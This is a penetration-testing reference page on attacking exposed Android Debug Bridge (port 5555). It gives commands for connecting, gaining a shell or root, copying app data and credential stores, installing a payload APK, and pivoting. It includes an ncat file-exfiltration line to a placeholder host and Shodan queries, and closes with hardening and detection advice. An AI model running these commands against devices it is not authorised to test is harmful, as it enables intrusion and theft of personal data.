5555 - Android Debug Bridge

Reading time: 6 minutes

Basic Information

From the docs:

Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.

• Historical default TCP port: 5555 (classic "adb tcpip" mode).
• Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications.

Example nmap fingerprint:

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

If you find ADB exposed and reachable, try connecting and enumerating quickly:

adb connect <ip>[:<port>]      # Default is 5555 for classic mode
adb devices -l                 # Confirm it shows as "device" (not unauthorized/offline)
adb shell                      # Get an interactive shell (uid usually shell)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true               # Works on eng/userdebug/insecure builds, many emulators/IoT

• If the device enforces ADB authentication (ro.adb.secure=1), you’ll need to be pre-authorized (USB RSA auth) or use Android 11+ Wireless debugging pairing (which requires a one-time code displayed on the device).
• Some vendor images, engineering/userdebug builds, emulators, TVs, STBs and development kits expose adbd without auth or with adbd running as root. In those cases, you’ll typically land directly in a shell or root shell.

For a general ADB command reference, see:

ADB Commands

Quick Post-Exploitation

Once you have shell, validate privileges and SELinux context:

id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint

Enumerate and capture data

• List third-party apps and paths:

  pm list packages -3
  pm path <pkg>
  

• If you have root (adb root or su works), you can access /data directly. If not, prefer run-as for debuggable apps:

  # Without root, for a debuggable app
  run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>
  
  # With root
  cp -a /data/data/<pkg> /sdcard/<pkg>
  exit
  adb pull "/sdcard/<pkg>"
  

• Useful system artifacts (root required):
  • /data/system/users/0/accounts.db and related AccountManager data
  • /data/misc/wifi/ (network configs/keys on older versions)
  • App-specific SQLite DBs and shared_prefs under /data/data/

You can use this to retrieve sensitive info (e.g., app secrets). For notes about Chrome data considerations, see the issue referenced here.

Code execution and payload delivery

• Install and auto-grant runtime permissions:

  adb install -r -g payload.apk         # -g grants all runtime perms declared in manifest
  adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1
  

• Start activities/services/broadcasts directly:

  adb shell am start -n <pkg>/<activity>
  adb shell am startservice -n <pkg>/<service>
  adb shell am broadcast -a <action>
  

Port forwarding and pivoting

Even without root, adb can forward local ports to device ports and vice versa. This is useful to access services bound locally on the device or to expose attacker services to the device.

• Forward host->device (access a device-local service from your host):

  adb forward tcp:2222 tcp:22       # If device runs SSH (e.g., Termux/Dropbear)
  adb forward tcp:8081 tcp:8080     # Expose app’s local debug server
  

• Reverse device->host (let the device reach a service on your host):

  adb reverse tcp:1080 tcp:1080     # Device apps can now reach host:1080 as 127.0.0.1:1080
  

• File exfiltration over sockets (no sdcard writes):

  # On host: listen
  ncat -lvp 9000 > dump.tar
  # On device: send directory as tar (root or run-as as applicable)
  adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000
  

Wireless Debugging (Android 11+)

Modern Android implements TLS-protected wireless debugging with device-side pairing and mDNS discovery:

# On the device: Developer options -> Wireless debugging -> Pair device with pairing code
# On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port>   # Enter the 6-digit code shown on device
adb mdns services                  # Discover _adb-tls-connect._tcp / _adb._tcp services
adb connect <device_ip>:<conn_port>

Notes

• Ports are dynamic; don’t assume 5555. mDNS service names look like:
  • _adb-tls-pairing._tcp (pairing)
  • _adb-tls-connect._tcp (paired connect)
  • _adb._tcp (legacy/plain)
• If mDNS is filtered, classic USB-assisted enabling may still work on some builds: adb tcpip 5555 then adb connect <ip>:5555 (until reboot).

Offensive implications: if you can interact with the device UI (e.g., physical access or mobile MDM misconfig) to enable Wireless debugging and view the pairing code, you can establish a long-lived paired ADB channel without a cable. Some OEMs expose ADB over TCP in engineering/dev images without pairing—always check.

Hardening / Detection

Defenders should assume any reachable adbd (TCP) is critical risk.

• Disable ADB and Wireless debugging when not needed. Revoke USB debugging authorizations in Developer options.
• Ensure network policy blocks inbound TCP/5555 and mDNS-based ADB discovery on untrusted segments.
• On devices under your control:

  settings put global adb_enabled 0
  setprop service.adb.tcp.port -1   # disable TCP listening (or use: adb usb)
  stop adbd; start adbd             # restart daemon
  

• Monitor for mDNS records _adb._tcp, _adb-tls-connect._tcp, _adb-tls-pairing._tcp on corporate networks and alerts for unexpected 5555 listeners.
• Inventory for insecure builds: getprop ro.debuggable, ro.build.type, and ro.adb.secure.

Shodan

• android debug bridge
• port:5555 product:"Android Debug Bridge"

References

• Android Developers – Android Debug Bridge (adb): https://developer.android.com/studio/command-line/adb
• AOSP – ADB over Wi‑Fi, pairing and mDNS service names: https://android.googlesource.com/platform/packages/modules/adb/+/refs/tags/android-vts-15.0_r2/docs/dev/adb_wifi.md